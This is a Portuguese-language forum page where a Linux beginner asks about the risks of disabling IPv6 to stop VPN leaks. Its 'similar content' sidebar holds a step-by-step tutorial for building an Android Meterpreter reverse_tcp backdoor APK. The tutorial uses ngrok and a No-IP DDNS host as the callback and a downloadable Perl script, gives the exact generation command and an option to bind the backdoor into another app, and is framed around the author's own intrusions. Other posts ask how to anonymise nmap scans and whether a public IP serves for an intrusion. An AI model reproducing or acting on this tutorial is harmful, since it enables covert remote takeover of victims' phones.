Ir para conteúdo
Entre para seguir isso  
Visitante

Quais os ricos de se desativar o IPv6?

Recommended Posts

Visitante

Gosto de anonimanto e privacidade, sou mais um destes neuróticos por aí que quer ficar longe dos olhos das grandes corporações, empresas de poblicidade, trackers, etc., então gosto sempre de usar bloqueadores e vários outros serviços, como VPN, só que essa semana descobri algo que me deixou frustrado, "IPv6 e VPN". Sou um iniciante no Linux ainda, descubro coisas todos os dias e a descoberta da vez foi que os serviços de VPN comumente cobrem apenas o IPv4 deixando vazar então o endereço de IPv6, e meio que literalmente inutilizando o anonimanto que a VPN proporcionaria. Isso me deixou puto pra caralho, porque justamente o que quero é anonimanto, então o que pensei em fazer? Depois de tentar configurar por várias vezes o IPv6 para ficar anônimo de alguma forma, optei por desativá-lo. Daí vieram minhas dúvidas.

Quais as possíveis consequências de desativar o IPv6?

O IPv4 juntamente com a proteção que fornece a VPN daria uma segurança a nível (ou melhor) que a do IPv6? Porque sei que o IPv4 tem problemas de segurança, então a VPN poderia sana-los? 

Essa foi a única forma que encontrei de conseguir ficar anônimo quando se trata de endereços de IP, se alguém puder me indicar outras formas, como anonimizar o próprio IPv6, algo que não consegui.

Meu sistema operacional é o Linux Mint e uso a própria VPN que vem nele, configuro lá e acesso. Daí o serviço de VPN que uso pra acessar é do RiseupVPN.

Compartilhar este post


Link para o post
Compartilhar em outros sites

Crie uma conta ou entre para comentar

Você precisar ser um membro para fazer um comentário

Criar uma conta

Crie uma nova conta em nossa comunidade. É fácil!

Crie uma nova conta

Entrar

Já tem uma conta? Faça o login.

Entrar Agora
Entre para seguir isso  



  • Conteúdo Similar

    • Por DoctorsPeppers
      Um problema recorrente durante minhas invasões foi que por eu morar em uma grande metropole, não tenho um IP fixo, com isso não consigo abrir uma porta de meu roteador apenas para mim, para contornar esse problema resolvi usar o NGROK que abre uma porta no servidor dele trazendo diretamente até meu localhost. O problema parecia ter sido resolvido, até eu notar que a porta criada pelo NGROK mudava constantemente, então resolvi esse problema com uma simples adição de um DDNS que redireciona para o IP e porta do NGROK, o serviço que uso atualmente é o NOIP que vem sendo ótimo para as minhas nessecidades. Mas então eu notei outro problema, criar payloads assim exige um conhecimento e lógica um pouco avançados, então resolvi fazer esse tutorial,  voce tera que ter apenas um computador com kali linux instalado e o programa NGROK, junto claro do metasploit.

      -Para começar entraremos no site do NGROK e baixaremos seu executavel, esperando que voces tenham um conhecimento prévio sobre linux vou pular a instalação.
      -Após instalar iremos executar o comando: "ngrok authtoken <Seu token>". O token pode ser facilmente achado no site do NGROK
      -Depois do ngrok configurado iremos abrir uma porta com o simples comando: "ngrok tcp 8080", assim ele nos fornecera uma url com uma porta qualquer apontando para uma no localhost:8080
      Ficara mais ou menos assim:
                                                                                   
      Session Status                online                                             Account                       Jocelin Flores(Plan: Free)                  Version                       2.2.8                                              Region                        United States (us)                                 Web Interface                 http://127.0.0.1:4040                              Forwarding                    tcp://0.tcp.ngrok.io:13200 -> localhost:8080                                                                                        Connections                   ttl     opn     rt1     rt5     p50     p90                                      0       0       0.00    0.00    0.00    0.00       -Agora criaremos uma conta no https://www.noip.com/
      -Após sua conta estar criada iremos na aba My service e em DNS record.
      -Clique em ADD hostname no canto inferior.
      -defina o hostname que voce quiser.
      -E defina a configuração como Port 80 redirect.
      -agora iremos pegar a url do ngrok e a transformaremos num ip, normalmente é essa: 52.14.61.47. Mas sempre é bom verificar.
      -Defina a porta que esta após a URL em fowarding, isso se encontra na interface do ngrok .
      -Adicione o hostname e deixe o noip aberto.
      -Após isso iremos voltar para o terminal.
      -Voce pode tanto fazer a mão quanto baixar o meu script daqui, mas ensinarei do script.
      -Entre no github e baixe, extraia em alguma pasta o arquivo que esta nomeado como backdoor arquivo: https://github.com/Doctorspeppers/scripts_perl
      -Após isso tente executar o comando:
      perl backdoor -h  
      -Se der erro não se assuste, apenas de um: 
      apt-get install perl -y  
      -Após isso se aparecer as informações e comandos do arquivo esta tudo ok.
      -Usaremos a vertente "perl backdoor -i", pois ela esta definida para ser usada com DDNS.
      -de o comando:
       
      backdoor -i <exploit> <ip/ddns> <port> <ngroklocalport> <apkout>  
      -Legenda:
      <exploit> = Payload que deseja usar. <ip/ddns> = seu ddns que voce definiu no hostname la em cima. <port> = essa sempre sera 80 no no-ip por aquela configuração, mas se usar outro DDNS troque para a que voce escolheu. <ngrocklocalport> = A sua porta que voce definiu no ngrok, aqui no caso a 8080. <apkout> = aonde voce quer despejar o seu backdoor com o nome dele. -Fim da legenda-

      -No meu caso aqui seria assim o comando:
       
      perl backdoor -i android/meterpreter/reverse_tcp  doctorspeppers.ddns.net 80 8080 /root/backdoors/test.apk  
      -Isso claro para um backdoor em um android.
      -tambem é possivel usar o "perl backdoor -i -x" que faz com que voce possa mesclar o backdoor com outro app.
      -note que ao voce colocar o "-x" voce adiciona depois a localidade do app, de resto continua normal.
      Edit1: Toda vez que voce abrir o NGROK para entrar no backdoor, atualize a porta no DDNS e espere 5 minutos
      Edit2: Sim, é possivel utilizar 2 NGROKS em diferentes diretorios instalados para utilizar + de 1 interface do metasploit
      Vou responder as duvidas desse topico por 1 mês e atualizar o script a cada semana, bom aprendizado a todos ^-^
    • Por hakai
      Salve galera, alguem sabe me dizer se aquele esquema de ligar o whonix com o kali da anonimato em linha de comando? Tipo para passar um nmap etc..
    • Por CyborgMx
      eai galera beleza? vim aqui compartilhar esse esquema com vocÊs, pois não sei vocÊs mais eu prefiro usar o kali instalado no HD,  por isso tenho um HD  para o kali e um para o windows
      espero que esse conteúdo de alguma forma ajude algum de vocÊs VLW.
       
       
       
    • Por B3T4
      Quando se consegue o IP de alguém via internet(Ex: Meu IP), esse IP é aquele que serve para uma invasão??
      Ex: quando entramos em alguns sites eles mostram um alerta parecido com esse:
      "Detectámos que estás a usar o IP 186.89.175.6 e que estás em (ou perto) no país Brazil. Se nós conseguimos saber isto, os outros sites por onde andas também conseguem"
      Mas todos sabemos que quando pegamos o IP de alguém, esse tal IP e semelhante a este do alerta, mas o IP que esta configurado manualmente na placa/adaptador de rede wireless da vitima é diferente desses conseguimos pegar pela internet.
      O "X" da minha questão é o seguinte: esse IP que conseguimos pegar pela internet, é o IP que serve para uma invasão?
      Ou a invasão só acontece se tivermos o IP que esta configurado manualmente na placa/adaptador de rede wireless da vitima?
       
      Resumo do PC alvo(Um notebook meu que esta conectado em uma rede Wi-Fi que não é minha)
      OBS: Meu PC para invadir o alvo esta conectado em uma rede minha, Mas meu notebook esta conectado em uma rede que não me pertence.
      Notebook no site, Meu IP, mostra um certo número de IP(O provedor o site conseguiu identificar corretamente)
      Notebook em, configurações do TCP/IP, Mostra o IP configurado manualmente por mim
      Notebook no software, Ralink Wireless Lan Card, mostra o IP configurado manualmente por mim no TCP/IP
    • Por Apoc
      Salve negada! 
      Quero compartilhar uma ferramenta muito útil que andei testando.
      VPN gratuita hoje em dia ta complicado de achar, pois bem, apresento uma VPN gratuita de qualidade.
       
      Ela foi feita pelos mesmos criadores do Protonmail. Se você não conhece, está perdendo a oportunidade de ter uma conta de e-mail das mais seguras da atualidade.
      Eles prezam pela privacidade e liberdade na internet, sendo assim, eu não acredito que iriam fazer um trabalho mal feito na VPN.
       
      Ela tem alguns planos pagos mas também há o plano gratuito. Apesar de na descrição ele informar algumas limitações, quero enfatizar que na lista de download dos servidores, quando você se cadastra no plano grátis, eu consegui baixar e conectar normalmente em um servidor da Suiça utilizando como Plus alguns servidores Tor. O que de acordo com a descrição do plano, eu teria que pagar para poder usar.
       
      OBS: Você vai ter a opção de utilizar o Cliente do ProtonVPN, baixar, instalar e usar. Ou vai poder usar um arquivo de configuração para OpenVPN.
      Eu utilizei a segunda opção, apenas por que eu já tenho o OpenVPN instalado, não queria baixar mais um programa, mas vale a pena testar o cliente deles, deve ser fácil de usar.
       
      Link para escolha do plano e registro: https://protonvpn.com/pricing
       
      Evidência de que consegui usar um servidor Tor no plano grátis (é eu poderia ter printado a página toda mas foda-se, vai ter q confiar na minha palavra, fiquei com preguiça de conectar novamente só pra printar):

       
       
      ProtonVPN

×

Informação Importante

Ao usar este site, você concorda com nossos Termos de Uso.